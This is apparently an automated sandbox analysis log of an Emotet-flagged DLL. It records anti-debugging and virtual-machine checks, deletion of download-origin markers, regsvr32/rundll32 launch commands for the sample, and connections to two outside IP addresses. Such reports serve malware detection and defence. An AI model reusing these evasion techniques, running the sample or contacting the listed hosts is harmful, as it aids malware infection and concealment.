Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.689176981.0000000004740000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.689176981.0000000004740000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb"a source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.689176981.0000000004740000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb~a source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 0000000B.00000003.689071847.0000000004742000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.689176981.0000000004740000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.689176981.0000000004740000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbla source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: aEnjrHnCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000B.00000002.701961614.0000000000182000.00000004.00000001.sdmp

Source: hPJnda9rBy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: hPJnda9rBy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: hPJnda9rBy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: hPJnda9rBy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: hPJnda9rBy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00861195 push cs; iretd	0_2_00861197
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1003060D push ecx; ret	2_2_10030620
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10030E7D push ecx; ret	2_2_10030E90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1003060D push ecx; ret	3_2_10030620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04431195 push cs; iretd	4_2_04431197

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_1003E278 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

2_2_1003E278

Source: hPJnda9rBy.dll

Static PE information: real checksum: 0x970bf should be: 0x924d6

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\hPJnda9rBy.dll

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Knpnqswfpazuozi\koewoajrwakr.ckb

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Nqsihdpwvadvq\acqvopgo.gfg:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Knpnqswfpazuozi\koewoajrwakr.ckb:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,	2_2_100250A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001DFC0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	2_2_1001DFC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,	3_2_100250A3

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 5256

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_2-21436
Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_3-17040

Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 4.8 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.3 %

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node			graph_2-21137
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_3-17042

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000013.00000002.814970608.000001691AA81000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.814320214.000001691AA81000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW `
Source: Amcache.hve.11.dr	Binary or memory string: VMware
Source: Amcache.hve.11.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.11.dr	Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.11.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.11.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.11.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: svchost.exe, 00000013.00000002.815169961.000001691AADB000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.815236727.000001691AAF1000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.11.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.11.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.11.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_1002DB0D

Source: C:\Windows\SysWOW64\regsvr32.exe

2_2_1003E278

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10002D40 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

2_2_10002D40

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086F7F7 mov eax, dword ptr fs:[00000030h]		0_2_0086F7F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443F7F7 mov eax, dword ptr fs:[00000030h]		4_2_0443F7F7

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_008836AA LdrInitializeThunk,

0_2_008836AA

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1003A8D4 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_1003A8D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_1002DB0D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10032CB9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_10032CB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1003A8D4 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_1003A8D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_1002DB0D

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.16.218.101 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.138.98.34 80			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6532 -ip 6532	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 536	Jump to behavior

Source: loaddll32.exe, 00000000.00000000.676705643.0000000001380000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.678482379.0000000001380000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000000.676705643.0000000001380000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.678482379.0000000001380000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000000.676705643.0000000001380000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.678482379.0000000001380000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000000.676705643.0000000001380000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.678482379.0000000001380000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	2_2_1003E000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	2_2_1003D098
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,	2_2_1002129B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	2_2_1003D35E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	2_2_1003850E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	2_2_1003D7AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	2_2_1003C7D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	2_2_1003D8C5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	2_2_1003D95D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	2_2_1003D9D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	2_2_1003F9F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	2_2_1003EA86
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,	2_2_1003EABA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	2_2_1003DBA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_1003EBF9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_1003DC64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_1003DCCB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	2_2_1003DD07
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,	2_2_1003CE40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_1003E000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	3_2_1003D098
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,	3_2_1002129B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	3_2_1003D35E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	3_2_1003850E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	3_2_1003D7AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_1003C7D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_1003D8C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	3_2_1003D95D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_1003D9D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_1003F9F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	3_2_1003EA86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,	3_2_1003EABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_1003DBA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_1003EBF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_1003DC64

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_1003732F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_1003732F

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10024F01 _memset,GetVersionExA,

2_2_10024F01

Source: Amcache.hve.11.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 4.2.rundll32.exe.4430000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5610000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.50f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5250000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5250000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4bb0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.860000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.820000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.31c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.52e0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5280000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.37e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4940000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5120000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.42e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.50f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b20000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b50000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2f10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.42e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b80000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.820000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4a40000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b80000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4a70000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.4fb0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4910000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.4ac0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.820000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.820000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.860000.1.unpack, type: UNPACKEDPE
